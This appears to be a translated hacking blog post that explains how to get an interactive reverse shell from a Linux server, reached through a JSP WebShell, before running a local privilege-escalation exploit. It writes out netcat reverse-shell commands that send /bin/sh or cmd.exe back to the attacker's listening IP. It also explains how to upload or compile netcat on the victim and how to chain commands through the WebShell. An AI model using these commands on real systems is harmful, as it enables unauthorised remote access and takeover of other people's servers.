I played for half a day with a Linux WebShell that my friend gave me. I wanted to practice the UDEV privilege escalation, but in the end found that the server seems to have been patched.
Still, there were other gains, so let me talk about bouncing back a Linux shell (in YY).
The vast majority of Linux privilege escalation relies on a local exploit. A WebShell can generally execute commands, but our exploit must be run in an interactive environment: if it is launched straight from the WebShell, the root shell it spawns on success is not attached to anything we can type into (its stdin is closed as soon as the request ends), so we cannot use it even though the escalation itself worked. Therefore we first need to bounce back a command-line shell (I will call it a "CmdLine Shell" rather than a "cmdshell", to avoid confusion with the Windows cmd.exe ^_^), and then run the exploit from that terminal to escalate privileges.
Most people use the Back Connect function of a PHP WebShell to bounce a shell back, but sometimes the server does not support PHP, or the WebShell has no such function. For example, the JSP shell on the server that my friend gave me over the past two days only supports JSP and not PHP. In that case we can fall back on the classic netcat.
Anyone who has done this on Windows knows the drill: run nc -vv -lp 1234 on our own machine to listen on a port, then run nc 12.21.12.21 1234 -e cmd.exe on the compromised server (the "broiler"; 12.21.12.21 stands for our own IP), and a reverse shell comes back. The same works on Linux.
With the listener running on our machine, execute nc 12.21.12.21 1234 -e /bin/sh from the WebShell and it bounces a CmdLine Shell back to us. (One caveat: the -e option only exists in the "traditional" netcat build; the OpenBSD variant that many distributions ship does not have it, so check nc -h on the target before relying on it.)
However, things are often not 100% smooth. Take the two servers from last night: neither could run nc directly. One had an nc, but it never worked when executed; the other had no nc at all ....
Still, we can install one ourselves. The quick way is to upload a binary (I started by uploading the netcat that comes with Debian, and it still would not run ....). If that fails, upload the source code and compile it on the target machine.
Of the two machines last night, one got a locally compiled nc and the other was compiled on the target. If an uploaded nc simply runs, that is easy; if you need to compile on the target machine, here is a little trick:
Before we have the CmdLine Shell, we can only execute commands through the WebShell, and normally only one command per request, after which we wait for its output. Each request starts a new process whose working directory is the WebShell's own directory, and nothing, not even a cd, survives from one request to the next. Suppose the WebShell lives in /var/www/site, so every command starts in /var/www/site, and we have unpacked the netcat source into /tmp/netcatsrc. When we go to build it, we can start configure by its absolute path, /tmp/netcatsrc/configure, but the next step, make, will not work: the current directory is still /var/www/site rather than /tmp/netcatsrc, so make finds no Makefile and reports an error right after configure finishes. (Autoconf-style configure scripts also write config.status and the generated Makefile into whatever directory they are run from, and the web root is usually not writable by the web server's user, so it is better to run configure from inside the source directory as well.)
The fix is actually very simple: join the two commands into one: cd /tmp/netcatsrc; make
The semicolon (;) separates the two commands, so make runs right after the directory change, in the same process, and the build no longer errors out. (A trick Stray Cat taught me .. ^_^) Writing it as cd /tmp/netcatsrc && make is slightly safer, since make is then skipped if the cd fails, and make -C /tmp/netcatsrc does the same without a cd. Apply the same idea to the configure step: cd /tmp/netcatsrc; ./configure
This trick is useful whenever the CmdLine Shell has not been obtained yet and every command still goes through the WebShell.